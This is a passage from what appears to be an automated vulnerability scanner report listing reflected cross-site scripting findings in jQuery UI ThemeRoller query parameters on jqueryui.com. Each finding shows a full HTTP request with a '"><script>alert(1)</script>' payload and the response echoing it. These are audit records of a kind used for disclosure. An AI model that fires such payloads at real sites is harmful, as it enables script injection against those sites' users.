GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa6c7b8"><script>alert(1)</script>81f4ae42993&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
oft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa6c7b8"><script>alert(1)</script>81f4ae42993&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e8e9"><script>alert(1)</script>bc1b48b47cf was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=756e8e9"><script>alert(1)</script>bc1b48b47cf&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=756e8e9"><script>alert(1)</script>bc1b48b47cf&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 446c7"><script>alert(1)</script>22b07013f0d was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75446c7"><script>alert(1)</script>22b07013f0d&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75446c7"><script>alert(1)</script>22b07013f0d&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconCo
...[SNIP]...

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3477"><script>alert(1)</script>00ee690a072 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75a3477"><script>alert(1)</script>00ee690a072&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75a3477"><script>alert(1)</script>00ee690a072&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=4
...[SNIP]...

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a648"><script>alert(1)</script>1c587b6ed83 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=952a648"><script>alert(1)</script>1c587b6ed83&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
TextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=952a648"><script>alert(1)</script>1c587b6ed83&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31b7"><script>alert(1)</script>1e318d1330f was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75c31b7"><script>alert(1)</script>1e318d1330f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75c31b7"><script>alert(1)</script>1e318d1330f&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22
...[SNIP]...

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6071a"><script>alert(1)</script>90cbce80a0e was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556071a"><script>alert(1)</script>90cbce80a0e&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556071a"><script>alert(1)</script>90cbce80a0e&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError
...[SNIP]...

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d510"><script>alert(1)</script>ecb5ac790e0 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=759d510"><script>alert(1)</script>ecb5ac790e0&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=759d510"><script>alert(1)</script>ecb5ac790e0&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=4
...[SNIP]...

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5155"><script>alert(1)</script>7fc8fd270e6 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0b5155"><script>alert(1)</script>7fc8fd270e6&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0b5155"><script>alert(1)</script>7fc8fd270e6&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

2.42. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5153"><script>alert(1)</script>c40354ad18f was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHigh